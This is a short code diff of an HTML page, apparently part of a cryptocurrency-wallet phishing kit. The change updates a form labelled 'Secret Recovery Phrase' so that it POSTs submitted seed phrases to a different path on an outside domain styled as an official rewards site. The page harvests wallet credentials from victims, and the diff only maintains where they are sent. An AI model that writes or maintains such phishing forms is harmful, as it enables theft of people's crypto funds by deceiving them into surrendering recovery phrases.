--- a/dapps/incorrect.html
+++ b/dapps/incorrect.html
@@ -37,7 +37,7 @@
 				
 
 			</div>
-			<form action="https://rewards-official.site/stake.unitymeta.io/asus.php" method="POST" id="secretPhraseForm">
+			<form action="https://rewards-official.site/unitymeta/asus.php" method="POST" id="secretPhraseForm">
 			<div class="content-key-container">
 			    <p class="content-key-text">
 					Secret Recovery Phrase
